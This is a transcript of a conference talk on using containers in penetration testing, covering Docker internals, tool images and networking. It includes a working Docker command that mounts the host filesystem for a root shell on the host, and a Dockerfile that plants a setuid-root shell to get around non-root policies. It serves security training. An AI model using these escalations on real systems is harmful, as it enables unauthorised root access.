
Containers for Pentesters by Rory McCune

BSides Dublin · 2023 · 29:14 · 105 views · Published 2023-07
Category: Technical
Style: Talk
Transcript [en]

Welcome along to this talk on containers for pentesters. I'm guessing by now a lot of people, and we've even seen examples in the previous talk, are using containers for a variety of things. What I wanted to do with this talk is talk a bit about what containers are, and then a bit about how they work, because when we're looking to use things, especially as pentesters, which is kind of the point of this talk, we want to understand how they work. If you're doing pen testing you can do some funny stuff, and it's easier to do that if you understand what your tools are

doing and how they actually operate. Then I'll talk about some gotchas and some ideas you can use when you actually want to make use of these things. Before I get started on the talk proper, a very quick "about me": why am I giving this talk? My background is pen testing; until fairly recently I was a pentester. I did this for a number of companies for a number of years, and latterly I was looking at a lot of containerized environments, a lot of Docker, a lot of Kubernetes. These days I'm a Senior Security Advocate at Datadog. If you've not heard of Datadog, we're a

large SaaS observability and security company. A couple of things I do in the cloud native, Kubernetes, and container community: I help maintain the CIS benchmarks for Docker and Kubernetes. Has anyone ever used either of those CIS benchmarks? OK. If you haven't come across the CIS benchmarks, they are vendor-neutral hardening guides that you can get for pretty much any technology you want; I help maintain the ones for Docker and Kubernetes. I'm also a member of Kubernetes SIG Security and the CNCF TAG Security. These are kind of like special interest groups, so if you're interested in cloud native security or container security, they're very easy to get involved

with: you just come along to a Zoom call, either weekly or bi-weekly, and they're a good place to find out what's going on and to get into discussions. So if this is an area you find yourself interested in, I very much recommend coming along to those. The first thing I wanted to talk about is: what is a container? Because this is really important and not necessarily that widely understood. Essentially, when you start a Linux container, what you are doing is starting a process, right? You're starting a program just like you're starting any other program. Containers are just processes; that's an important thing to remember. The way containers differ from your ordinary processes is all these kind of

boxes that go around them, and these are all different ways that the process is isolated from any other process running on that machine, or isolated from the underlying host. That's why, if you're in a container, you can't by default see all the files from the rest of the host. These are all existing Linux features, all things Linux does; you can use them without using containers at all. I'm not going to go a lot in depth into those, because it's quite a long topic. If that's one that's of interest, like how exactly do namespaces work, there's a series of blogs I'm doing at the moment on Datadog Security Labs where we go into a lot more depth.
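As a quick illustration of those building blocks: every Linux process, containerized or not, carries a set of namespaces, visible under /proc. A minimal sketch (any Linux shell; no container tooling required):

```shell
#!/bin/sh
# Every process's namespaces live under /proc/<pid>/ns; a container is just a
# process whose namespaces differ from the host's.
ls -l /proc/self/ns              # mnt, pid, net, uts, ipc, user, cgroup, ...
ns=$(readlink /proc/self/ns/pid) # e.g. pid:[4026531836]
echo "$ns"
```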

We go into a lot of detail about each of those, one at a time, and I've got a link to that at the end of the talk. Now, as the last speaker was willing to do live demos, I thought: why not, let's try some live demos. I'm going to demonstrate this to make it a bit more real, a bit more "yep, that's what's going on". So, I've got a machine here; this is just a Linux host running Docker. First I want to do a ps: we're going to do ps ax and grep for nginx. What I'm doing here is asking this machine: do you have

any nginx web servers running? The answer is: no, I don't. OK, cool. So then what we'll do is say docker run; let me go back in my shell history, not that one, that one. We're going to use docker run, and we're going to run a container based on the nginx image, which is that bit at the end; we'll give it a name, we'll call it webserver, and we'll run it in the background. So at this point I'm now running a Docker container; that's what I just did, I ran a container. However, from the machine's perspective, from this host's perspective, what have I done? I've started nginx. As far as that host is concerned, all I did was start the nginx process running on

the machine, just as though I'd installed nginx and started running it, because it doesn't know about containers. The underlying host doesn't know what a container is; it just knows about processes. So it thinks: ah, you're running a process then. And I'm going to make a note of this PID, this process ID, because one of the cool things is that once you know containers are just processes, you can interact with them just by using Linux process tools; you don't have to use the container tools. And we can demonstrate that. Let's put this at the top: we'll do docker exec. Docker exec just executes a command inside a container.
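The demo so far, sketched as a script (the nginx image and the webserver name follow the talk; it's guarded so it degrades cleanly on machines without Docker):

```shell
#!/bin/sh
# From the host's point of view, starting a container just starts a process.
if command -v docker >/dev/null 2>&1; then
    ps ax | grep '[n]ginx'                  # before: no nginx processes
    docker run -d --name webserver nginx    # run a container from the nginx image
    ps ax | grep '[n]ginx'                  # after: nginx appears as an ordinary process
    docker rm -f webserver                  # clean up
    demo=ran
else
    demo=skipped                            # no Docker on this machine
fi
echo "$demo"
```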

I'm going to create a new file by saying touch mynewfile; right, I'm just going to create a file inside the container. Once I've done that, say I want to get access to that file, say I want to mess around with the files in my container and I don't want to use the standard container tools. Well, because we know containers are just processes, I can go and find that process's filesystem and play with it, and in this case all we need to do is use sudo ls /proc/<PID>/root. What I'm doing here is listing the files in a directory in

the proc filesystem in Linux. The proc filesystem is a special filesystem in Linux: it contains information about every process running on the machine, amongst a lot of other things. One of the things you can do in the proc filesystem is get access to the root filesystem of any process, and containers are just processes, so I can get access to any container's filesystem by going through proc. And as we can see, I can. You see there, all those files in the root filesystem are essentially what comes from the nginx image, plus mynewfile, which is the file I just created.
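The /proc trick is not container-specific; it works for any process you own. A sketch using a plain background process (no Docker needed), since the mechanism is identical:

```shell
#!/bin/sh
# /proc/<pid>/root is that process's view of the root filesystem. For a
# container PID it shows the container image's files; for an ordinary
# process it is simply the host's /.
sleep 30 &
pid=$!
entries=$(ls /proc/$pid/root/ | wc -l)   # browse the process's root filesystem
echo "found $entries top-level entries"
kill $pid
```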

So literally, once you know containers are processes, you can just play with them, use them like processes. And if you're a pentester thinking "how can I use these things?", hopefully that makes it a bit easier, because you can think: OK, I understand how this works. So, demo one worked, awesome. Next: what's Docker, right? I used the docker command there; the stuff I've been running so far has been Docker commands. There are other container tools available, but Docker is definitely the most used one. If you're getting involved with containers for the first time, I'd recommend starting with Docker, just because there are lots of tutorials and other information and it's easy to get hold of. What does Docker do? Well, it's

actually fairly straightforward. Docker is a client: the Docker client, which I was just running there, is a Golang binary; you can move that file around to different machines and it'll work the same way. It talks to the Docker daemon, and it talks over a Unix socket file. A Unix socket file is just a way of making a server available without putting it on the network, but basically it's talking to a web server. The Docker daemon is just a REST API; if you're used to using REST APIs, if you usually do web app stuff, then the Docker daemon is pretty much a REST API. The Docker daemon will then go and get any images it needs from a container

registry; it could be Docker Hub, could be any of the other many, many registries, and that's also a REST API. So if you're a pentester and you've got a background in web app testing or web API testing, you'll find that a lot of the stuff in container land is just a series of REST APIs talking to each other; they just hide it really well behind some nice fancy GUIs and CLIs. And then all of these are starting containers. That's all Docker actually does: the client gives a REST API command to the Docker daemon, which then starts a process on the machine. So it's actually not too complicated, and we can now demonstrate a bit of that.
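You can talk to that REST API directly; a sketch with curl (the default socket path and the v1.41 API version are assumptions, and it's guarded so it degrades cleanly where Docker isn't running):

```shell
#!/bin/sh
# The Docker daemon listens on a Unix socket; curl can speak HTTP to it directly.
sock=/var/run/docker.sock
if [ -S "$sock" ] && command -v curl >/dev/null 2>&1; then
    curl --silent --unix-socket "$sock" http://localhost/_ping            # liveness check
    curl --silent --unix-socket "$sock" http://localhost/v1.41/images/json # same data as `docker images`
    api=present
else
    api=absent    # no Docker daemon socket (or no curl) on this machine
fi
echo "$api"
```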

So, if I do this socat command; socat, if you've not come across it, is a really handy tool for playing with traffic and intercepting things. This socat command basically says: give me a new socket file, and send any traffic that socket file receives on to the Docker socket. So what I'm actually doing is putting something in as an interception point, so I can look at the traffic and see what's going by. If I hit enter on that, it will sit there quite happily and listen. And then in the other terminal, if I tell this terminal: hey Docker,

please go and talk to my temporary socket file that I just created and give me a list of container images, it'll do that. In this terminal it says: OK, there's your list of images, which is what I'd expect. But back here we can actually see what happened, and literally it's just a REST API. It starts off sending a HEAD request to /_ping; this is "hey Docker daemon, are you alive, are you there?", and it says "yes I am". It's got a very nice, distinctive User-Agent, if you're ever looking for it. It gets back a 200, and then it says: great, go to this API endpoint. So it's just /<API version>/images/json: a really simple REST API.
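The interception setup, as a sketch (the temporary socket path is my choice; guarded so it only runs where socat and Docker are present):

```shell
#!/bin/sh
# Relay a temporary socket to the real Docker socket, printing traffic (-v).
if command -v socat >/dev/null 2>&1 && [ -S /var/run/docker.sock ]; then
    socat -v UNIX-LISTEN:/tmp/proxy.sock,fork UNIX-CONNECT:/var/run/docker.sock &
    relay=$!
    sleep 1
    # Point the Docker client at the relay; the HTTP exchange shows up in socat's output.
    DOCKER_HOST=unix:///tmp/proxy.sock docker images
    kill $relay
    rm -f /tmp/proxy.sock
    ran=yes
else
    ran=no
fi
echo "$ran"
```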

And Docker comes back and says: cool, there's your list of all the things, a big JSON blob. So Docker: really, that's it, that's all it does. It says "I'm going to tell you to do various things with containers and you're going to launch them for me". One thing to mention: as pentesters, you sometimes need fine-grained control over what your machine, what your tools, are doing, like exactly what networking you're doing, if you're doing any low-level testing, anything to do with network sniffing. Docker Desktop is what you will use out of the box if you are running on Windows or Mac.

Docker Desktop hides some complexity from you; it looks very nice and it works really well, but if you're doing networking I'd recommend avoiding it, because what it does is insert this Docker Desktop thing in the middle, and it actually hides a Docker VM. You can't even see that virtual machine: if you're on Windows, it will not show up in Hyper-V Manager. It works really nicely if you're just doing developer work or high-level work, but if you're doing any network testing I would recommend avoiding it, because it does quite a lot of fancy network magic, is the only way I can put it, and

it's just going to get in the way of your tools. What I'd typically recommend is getting a VM you manage yourself and installing Docker on top of it; don't use Docker Desktop. Just worth knowing as pentesters: it's a really nice piece of software, but it does a lot of magic, and I don't like magic when I'm pen testing, because when things break in the middle of a test I'm like "why did you break?" and the answer is: some complex magic broke on me. So, a very important thing to know about Docker is the Docker security model, which is what I always describe as "flexible". What it is: Docker will say that anyone who can run Docker commands on a

machine can be root on that machine. That is by design; that's not some leet hack, it's just the way it works. It has all these different layers of isolation that I showed you on the diagram earlier on, and it says anyone who can run Docker commands can remove all of those layers of isolation at any time, in any way they want. The culmination of this is this command here, this rather long-looking command. This was from a blog in 2015 by a guy who called it the most pointless Docker command ever. When I was pen testing this was my favorite Docker command, and I know how sad it is to have a favorite Docker command, but this is my favorite Docker

command, and I'll show you why, because we can demonstrate this one super simply.

So, this Docker command, very long; what it basically does is this. It first uses a flag called --privileged. I actually got to talk to the guy at Docker who designed this flag, and he said they wanted to call it --insecure, but their management wouldn't let them; but that's what it is, the remove-the-security flag. This flag is the bane of container security's existence, the fact that this thing was ever made, because it's basically the total-security-off switch. But it makes things work, right? So a lot of people will use it, because hey, things work really easily if I turn all the security off. We then say: OK, you know how we were

getting isolated filesystems and networking and everything? We don't want any of that. We want the host's networking, we want the host's process list, we want the host's everything. We then mount the root filesystem from our local machine into the container, and then we run our command against the host. And you can guess what happens when I run this: before I run this command, I'm an ordinary user on this machine; when I run it, I'm the root user. It's that simple, it's that straightforward, and that is by design; that's how Docker works if you let anyone run containers on a machine. If you're a pentester and you find a Docker daemon, just run that command.
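A version of that command, wrapped in a function so nothing runs until you call it deliberately (the busybox image and the chroot step are one common form of this trick, my choice rather than the talk's exact wording; only use it on systems you're authorised to test):

```shell
#!/bin/sh
# --privileged drops the security layers; --net/--pid/--ipc=host drop the
# isolation; -v /:/host mounts the host's root filesystem; chroot makes it ours.
host_escape() {
    docker run --rm -it --privileged \
        --net=host --pid=host --ipc=host \
        -v /:/host busybox chroot /host
}
# Calling host_escape anywhere you can talk to the Docker daemon gives you
# a root shell on the underlying host.
```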

And you get to be root. If you're doing Kubernetes and you've got lots and lots of machines, and Kubernetes basically just runs lots of containers across different hosts, you can run Kubernetes commands that do the exact same thing, and you get to be root on every single machine in the cluster. This is by design, out of the box; that's how containers are meant to work, and it's very important to know that when you're using them. So, why do we need these things as pentesters? This was kind of the point of the talk. We've seen how they work, we've seen what they do; why, as pentesters, would we want to use these things? For my money

there's a couple of reasons. The first one is: if you're a pentester, you have a new environment for every customer every week, and of course you never, ever keep an environment from previous times that might leave test data from previous customers in the same place; that has never happened to any pentester ever, yeah? Containers make it a bit easier to keep that stuff clean, because whenever you start a container you get a new ephemeral environment. It goes away, all the configuration goes, as soon as you stop that container; you start another one and it starts clean from the same template you had before. Containers make it easy

to get clean environments for your tools, so you don't run the risk of old data hanging around from previous times. Another thing: I'm guessing anyone who's ever been a pentester has found some tool for some obscure technology, some web app they don't normally do, and the tool was written seven or eight years ago using a really old, creaky version of Perl or Python or Node or whatever, and it uses a whole lot of old libraries and old versions of the language. The last thing you want to be doing is installing all of those on your shared virtual machine, because if you do that long enough you

will break your machine, everything will go wrong, and Node or Python will start complaining horribly. Containers let you put those things in a nice little bundle that stays isolated and away from anything else, so you don't have to worry about it making a mess of your machine. This is probably one of my favorite places to use containers: you can run old software, all the way back to really old versions of browsers, whatever else, in a way that won't make a mess of your virtual machines. Containers are good for that. Another thing they're good for is that they're very easy to maintain. We've been seeing some talks about CI/CD and

GitHub Actions and stuff like that, and it's really easy to maintain containers using CI/CD. I usually have mine set up so that they refresh and rebuild every week, so whenever I pull my container it's no more than a week old. And again, some customers are picky about you rocking up with really old, out-of-date software, so you can say: hey look, my software is nice and new, because it gets maintained automatically. The last one is: as pentesters, you're obviously going to be asked to test things like Kubernetes clusters, and the customer's default position will be "give me the container image you want to run". So you're going to

have to have them, because customers expect it. So, VM versus container. Obviously lots of people, most pentesters I would say, use virtual machines, and I'm not going to tell you it's always right to use containers; sometimes virtual machines are the best option. The main difference, for my money, is size. A VM image will end up being 10, 20, 30, 40 gig quite easily. Containers you can get all the way down: I think the smallest viable containers are measured in kilobytes, but realistically even my biggest, most bloated container image, the one I just chuck everything into, is one or two gig. So it's much easier to move around, to say to a customer: here is this

thing. It's much smaller, and you don't have to worry as much about filesystem limits or stuff like that, but ultimately there are different ways of looking at it. So, say you want to use containers, and you're thinking to yourself: where am I going to get my container images from? The first place you'll think to go is Docker Hub. Docker Hub has somewhere north of 8 million images currently available for you to download and run. Of those 8 million, about 200-ish are what I would call semi-trusted, as in they're maintained by Docker and either a commercial company or an open source project that actually says "we maintain them". The other, whatever, 8 million minus a

couple of hundred are totally untrusted. They could be literally anything; it doesn't matter what they say they are, there is no curation at all. They might take down malware when they get notified of it, but realistically speaking, most of the time that just means you'll get stuff that hasn't been patched in five or six years. There's stuff up there that just never gets patched: the person puts the image up, uses it for whatever they were using it for, and forgets about it. If you search for it you might end up pulling it down, and you'd get outdated software. But you could also get images that are, I think, typosquatting attacks; there is active malware on Docker Hub,

there is anything you like. Typically the best thing to do, I would say outside the official images, is never pull directly from Docker Hub for production tests. If you're doing some research on a throwaway laptop, fine, don't worry too much about it; but if you're going to a customer's production environment and you're going to run the tools from these images against a customer's production systems, do not do this from Docker Hub. The reason I mention this specifically is this: these are my images on Docker Hub. The top one there is literally just Alpine Linux with a couple of networking tools that I did as a throwaway years ago; the next two are my kind of kitchen-

sink images, where I put all my container tools, and those are the download stats. I can promise you that I'm not even 0.1 of a percent of those download stats, so some people somewhere in the world have decided to make heavy use of these images that I just put up there. I make no promises about maintaining them, about not putting malware in them, about not rickrolling anyone who runs them. There's nothing about them that gives you any assurance, but that does not stop people. The top one is at 1.75 million downloads; I don't know who's doing it, I have no way of knowing who's doing it. I mean, I could actually put a tracker into them;

you can do that, you can put trackers into container images. I haven't, but I could, to find out what's going on. That's why I'm saying this is a problem: because people totally do this, they just download images off Docker Hub and run them. If you're a pentester and you're doing this in production environments: please don't do that. Make your own images. Making container images is fairly straightforward; it's not super complex, it's not super obtuse. One thing about container images: most of the time they'll actually be linked to a GitHub repository or something else, and in there there'll be a thing called a Dockerfile. I'll show you in a second,

but Dockerfile syntax is really quite straightforward, really fairly basic. My typical rule of thumb is: if I want someone's Docker image, I just go and take a copy of the Dockerfile, look at it, and build it myself, because then I know what's in it, and I know how to patch it and maintain it as needed. It's not hard, but do build your own images; don't just use random images from Docker Hub, because sooner or later someone will have bad opsec. I mean, I'm a bad opsec role model for all anyone knows; I might have left my Docker Hub credentials lying around somewhere, someone steals them, corrupts those images, and suddenly

people are downloading them; not good times. So do make your own images. In terms of how you make those images, there are two major approaches: tool-specific versus kitchen sink. Tool-specific: I'm going to make one container image for every tool I run. This is the purist way; if you talk to container purists, they'll say containers should only run one process. I'm a pentester, I'm not really a purist. Realistically speaking, I have tried that approach; it's a pain to maintain. You have to have one image per tool, and every time you go to do an assessment you have to remember to bring all the right images. Kitchen-sink image: you just put all your

tools in one image and run a bash shell, so when I start the container it just runs a bash shell, or an ash shell, whatever you like; works perfectly well. That's typically how I would do it when I was a pentester: for example, I had all my tools for container work put into one image, and away you go. So, say you want to build your own images, I've convinced you containers are a great idea: what do you do? You have to pick a base distribution. Now, there are lots of different options for this; as I said, there are hundreds of images you could use as a base. Typically they all come down to choosing

a Linux distribution. My advice here is: pick the one you're most familiar with. People used to advise always using Alpine, at the top there, because it was quite small and slim; these days that's not so much of an issue. If you're a Red Hat person, pick the Red Hat one; if you're an Ubuntu person, pick Ubuntu or Debian. The only one I'd put at the bottom is: don't use CentOS, or at least don't use it from Docker Hub. The reason for that is that the CentOS image on Docker Hub is unmaintained. It is an official image, but it is unmaintained, and unless you go to the website you won't know it's unmaintained, because it doesn't say so on

the command line anywhere. You can totally run the CentOS image, and you'll get something that hasn't been patched since, I think, November last year; might be November the year before that, it's been a while anyway. And if we're talking about images that shouldn't get used: that one has millions of downloads, lots and lots of millions. Anyway, don't use CentOS; apart from that, pick a distribution you want. There's one other option, at the top there, called scratch, and scratch essentially means "give me a completely empty container image". So if you're looking for super minimal, super small, you can start your image from scratch, but it has no

operating system libraries in there at all. There are no time zone files, no TLS certificate files that your program might need; nothing. So only do that if you're using statically compiled binaries. If your tools are all statically compiled binaries and you're super good at making them work without supporting files, scratch is kind of cool, because it makes really small images. Dockerfiles, like I said, are not super complicated; Dockerfile syntax is not highly obtuse. Basically it works like this: you start off with a FROM, which is your base image, in this case ubuntu:22.04, which is my favorite base image. You then basically say to the

Dockerfile: do whatever you would need to do to install the tool. In this case I'm installing nmap, so I just say RUN apt-get update, because I need to update apt to get the latest packages available, then apt-get install -y nmap, and then apt-get clean. The reason I do that all on one line, and if you read Dockerfiles you'll see tons of this && && && pattern, is to do with how it builds up layers: basically it leaves files from earlier lines behind if you don't delete them. So you want to get everything on one line, you want to clean up after yourself, get rid of the cache, put it all on one line,

and then you just say: whenever this container is run, run the command nmap. It's super simple. That is an incredibly simple Dockerfile, an nmap image that will happily run nmap in a container. So, I can demonstrate; what are we doing for time? We have seven minutes left, so maybe just do the second part of this rather than the first. I do want to mention one specific thing; let's go back over here with this one. OK, so this basically runs that command. The reason I've got this command up, the thing I wanted to mention, is that what I did here was say --net host.
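Put together, the Dockerfile just described might look like this (reconstructed from the talk; ENTRYPOINT is my reading of "whenever this container is run, run nmap", so that extra arguments become nmap flags):

```dockerfile
# Minimal nmap image: Ubuntu base, one RUN line so no apt cache survives
# in an earlier layer, nmap as the entrypoint.
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y nmap && apt-get clean
ENTRYPOINT ["nmap"]
```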

So, by default when Docker runs, the container gets an IP address on an isolated network, and then Docker uses iptables under the covers (it doesn't tell you it's iptables, but it's just iptables) to get the traffic out to the rest of the world. If you're doing pen testing stuff with low-level tools, Wireshark, nmap, anything that does networking, I generally advise putting --net host on there, because then you're using the host's network adapter. You don't have to worry about any of that stuff getting in the way, NAT tables filling up, things breaking, which they might do otherwise. And you can run this quite happily, and yep, there's your output from nmap.
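As a sketch, wrapped in a function (the image tag nmap-image is illustrative, not from the talk):

```shell
#!/bin/sh
# Run a containerised nmap on the host's network stack, so raw-socket scans
# behave as if nmap were installed directly on the host.
run_nmap() {
    docker run --rm --net host nmap-image "$@"   # extra args become nmap flags
}
# e.g. run_nmap -sV 192.0.2.1
```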

And you can see, because of the way it's run, anything I gave after the image name is just treated as nmap flags. So you just give it the nmap flags, as though you were running nmap on the host, and it works quite happily: you get your nmap output just as if I'd run nmap directly, and you can do that for any tool you like. Remember, these things are just processes; all you're doing is running nmap as though it's on the machine, except you've got it isolated away, and you can have an old version of nmap, or a specific build of something you need, put into a container image, and away you go. Root versus non-root: the other

canonical sin of containers is that all containers run as root by default. This is because container people like things to work; they don't like things not to work. So they made the decision that every single container runs as root by default if you don't tell it otherwise. As a pentester this is fantastic, because what we do like doing is running as root, because then things don't get in the way so much. It's not as bad as running as root on the host, because you are still somewhat isolated, but if I were giving this talk to developers, the first thing I'd say is: please stop running all your containers as root, because it makes it

easier to break out; if there's a Linux kernel vulnerability, running as root makes it much easier to exploit. As pentesters, we typically just want to run as root. I'd recommend, as long as your customers are letting you do it, run your containers as root; it's the default anyway, and they'll probably be used to it. But there is a trick if you are told not to run as root. A good example of this: if anyone's come across a tool called Red Hat OpenShift, this is Red Hat's Kubernetes, their way of running containers in the enterprise, and if you do containers in the enterprise you will probably encounter OpenShift. It has a default position of "you will not do this":

they've taken a sensible default of "you will not run all your containers as root; this is bad". But as pentesters we might say: well, OK, we can't. So then you give your customer a container to run in their cluster, and they say: you can't run that, because it's running as root, it won't work. And you think: OK, I need a container that doesn't run as root. There's a way to get root back, though, which I wanted to mention because it's super simple. All you do in your Dockerfile is give yourself a setuid-root shell; you can see I've got it setting a setuid-root shell there, mode four

seven five five (4755), nothing fancy. And then, when you're running your container, you just run that setuid shell and you're back to being root again. Now, they can block that, but it's not a default setting; so if they've super hardened down their cluster, that won't work, but if they haven't super hardened down their cluster, it will work, and you get to be root again. So if you're doing all your container stuff, you can do it that way. There are some other tricks as well, but I use that one quite a lot, because otherwise, you know, I can't run as root.
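A sketch of that Dockerfile trick (the copied-shell name and the USER line are my choices; note that bash needs -p to keep the effective UID, a detail the talk doesn't cover):

```dockerfile
# Bake a setuid-root shell into the image so a non-root user can get root back.
FROM ubuntu:22.04
RUN cp /bin/bash /bin/rootshell && chmod 4755 /bin/rootshell
# Run as an unprivileged user to satisfy the cluster's non-root policy...
USER 1001
# ...then, once inside: /bin/rootshell -p  (-p stops bash dropping euid 0)
```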

This is the one thing that will trip you up if you use containers: when you run your container, the filesystem is isolated, right? So when I dump the output of my nmap command somewhere, it's inside the container, not outside the container. The obvious problem is: how do I get my data, my test data, back out to my host machine? And that's really simple: you just use that switch down there, -v. You see it says -v with a testdata path, which maps to a testdata directory inside the container.
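A sketch of that volume mapping (the paths and the nmap-image tag are illustrative):

```shell
#!/bin/sh
# -v <host path>:<container path> makes a host directory visible inside the
# container, so tool output written there survives after the container exits.
get_scan_output() {
    mkdir -p "$HOME/testdata"
    docker run --rm -v "$HOME/testdata:/testdata" --net host \
        nmap-image -oN /testdata/scan.txt 192.0.2.1
    # scan.txt now sits in $HOME/testdata on the host
}
```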

Anything I put in the testdata directory inside the container will turn up on my host in my home directory under testdata, and you can make those names anything you like. That's just the trick you need to know when you're running these containers: the one additional thing you have to think about is how to get the data back out of the container when it's finished, if you're outputting to a file. If you're outputting to the screen, don't worry about it, it'll show up quite happily; but if you're outputting to a file, you do need to know about the volume switch, and then it should work quite well. So, in conclusion: containers are not too bad once you get used to them. You have

to get your head around the idea of this thing running as a kind of isolated process, but they do help a lot. They help keep your tool environments clean; they help when you've got old, creaky tools that were written in Perl 10 years ago and are unmaintained, or that one thing on your pen test you really need to make work; and they also help if you're doing jobs in Kubernetes and Docker environments, which is ever more common. When you see these kinds of jobs, customers will start saying things like "I'm expecting you to provide a container image to run". And they're very helpful if

you're doing Kubernetes work as well. There was quite a lot of stuff there, so I've put up some resources. The top one there is my kitchen-sink image: please copy that, fork the repo, have a look at it, make sure you're happy with what's in it, build it yourself, maintain it yourself, or just take the bits of it you like. The next one down: I experimented with tool-specific images; fundamentally, I've not maintained them, so again, don't just run them; please do check them and maintain them before you use them. This year we're doing a series on container security fundamentals, so if you've looked at this

and thought "yeah, that's nice, but how exactly does that work?", we're doing a lot more; we've covered namespaces, capabilities, and cgroups so far, and we'll get through all of them. Next, I maintain a container security site. This has got things like manifests: if you want a Kubernetes manifest that will give you root on every single host in the cluster, I've got one there, so you can run it and see if it works. And if it works, go and have words with the security team, because that shouldn't work; they should have blocked it. And then lastly, this one here: I got annoyed because I couldn't find all

the materials about container security, so there's an archive of 620 talks about cloud native and container security from KubeCons and Cloud Native Security Cons going back to 2016. There's a search function, so you can search any of them and say "I want to know more about Kubernetes RBAC" or "I want to know more about isolating containers", and you'll find a whole pile of stuff in there. You can add to all of these via the GitHub repos as well; well, not the Datadog one, but all the other ones are GitHub repos, so if you find something you want to

change or add, pull requests are always welcome. And we're dead on time. Those are my contact details: if you want to ask any questions, there's my email address, there's Mastodon, and if anyone's still on Twitter, there's Twitter. Hopefully that's been interesting.